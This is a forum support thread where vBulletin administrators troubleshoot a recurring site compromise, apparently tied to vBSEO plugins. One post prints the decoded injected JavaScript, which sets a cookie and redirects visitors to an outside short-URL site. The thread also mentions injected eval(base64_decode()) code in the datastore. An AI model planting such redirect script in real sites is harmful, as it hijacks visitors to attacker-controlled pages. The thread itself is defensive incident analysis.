Security issue

Ok, here are mine:

vBulletin 3.8.4

• AME - The Automatic Media Embeder 2.5.6
• Geek Auto-Linker 6.0.8
• vBSEO 3.5.0 RC2
• vBSEO :: Sitemap Generator 2.2

Off topic, but you should really upgrade to sitemap 2.5.

We had the same problem as well and reported some time ago.


Out of those plugins installed above, we had AME and VBSEO and Sitemaps installed.

We have another forum that has VBSEO and Sitemaps but no AME and it has NOT been hit.

No AME here. vBSEO and vBSEO Sitemap Generator as a match though.

List of our mods-

AMP Auto Tagger 1.0.1
Hasann - Sub-Forum Manager 4.0.0
ibProArcade for vBulletin 2.7.0
Member Tracking 4.0.1
Multiple Login Detector 1.03
Post Replacements 1.8
Post Thank You Hack 7.82
Prevent Spam 1.0
Separate Sticky and Normal Threads 4.0.1
Spiders in WGO 1.0
Thread Thumbnails 2.0.0
Usergroup Color Bar 2.0.0
vBSEO 3.5.0 RC2
vBSEO :: Sitemap Generator 2.5
vBulletin Blog 4.0.2
vBulletin CMS 4.0.2
VSa - Login To User Account 3.0.2

Hope this helps.

^note, you should install sitemap 2.6 on vb4.

Ok, so we were running Sitemaps Generator 1.7. Oops. Just upgraded that to the latest one today. Will see if that helps, but kind of doubt it because I'm assuming that you are already running that one, Brian?

On another note, we have 4 web servers running behind a load balancer - each one keeping its own set of Apache logfiles. I erased the logs completely on Saturday and then we got hit again on Sunday so it was relatively easy to scan through all of the logs to see if there was anything interesting. Nothing there. Nada. At least, nothing that caught my eye. This appears to be a SQL injection directly into my datastore table in the vB database that loads the famous eval(base64_decode()); code that redirects to the myfilestore.com site. This time there did not appear to be anything in my vbseo plugin's global_start hook, though it did appear there once in the past as well. I searched for catch phrases like eval, base64, etc. an returned nothing. Any other ideas? I'm still semi-convinced this is happening through vBSEO, somehow.

Hello,

did you store a copy of datastore at the moment when the issue was happening? If yes, can you provide it in the support ticket?

No, but if/when it happens again I'll make a copy of it. All I end up doing is cycling any product inside of AdminCP which rebuilds the datastore and gets rid of it. Interesting though that the common denominator here appears to be vBSEO and the Sitemap Generator. I'm not pointing fingers by any means, but if it's a common denominator I'd say it warrants some investigation. When I originally submitted a support ticket for this issue about a month ago, I was pretty much brushed off immediately as "this isn't a vBSEO problem". Glad to see that it's starting to get some more attention now that others are reporting it as well!

We are all for trying to find this if it is in fact a hole in our product, but without any log/etc data, it's a wild goose chase and no one has been able to supply such events yet.

if its not a hole in vbseo it might be a hole in vb it self, so it could effect everyone, i hope you guys find it..

Just a quick update - since patching to the Sitemap Generator version 2.5, we've not seen the exploit come back...yet. Can anyone confirm that this HAS happened to them while using v2.5? Trying to narrow things down as best as I can without being able to find anything suspicious in the log files. I'd love nothing more than to say that this fixed the problem, but for now I'm keeping my fingers crossed.

The javascript code translates into:

Code:

var vbsp='96e3ad8c';
function ipbcc(name, value) {
    var date = new Date();
    date['setTime'](date['getTime']() + 86400000);
    var expires = '; expires=' + date['toGMTString']();
    document['cookie'] = name + '=' + value + expires + '; path=/'
};
ipbcc('vbsp', '1');
document['location'] = 'http://url2short.info/' + vbsp;

However I still can't find where on the serverside it is being outputted from though >_<

- Twelve-60

I just patched up a compromised installation by installing Sitemaps 2.5 and reseting the datastore. I'll keep checking it out over the next few days to make sure that it stays closed.

Our hijack was going to URL123 - free url redirection and masking service. I noticed it was being hosted by DreamHost and sent a report to their abuse inbox. Hopefully this scumbag has a bunch of sites hosted through them that will get shut down.

Also uploading a dump of our infected datastore for analysis. Hope it's helpful.

After being unsuccessful in finding the source of the outputted JavaScript, I reimported crawlability_vbseo.xml and it seemed to fix it!

- Twelve-60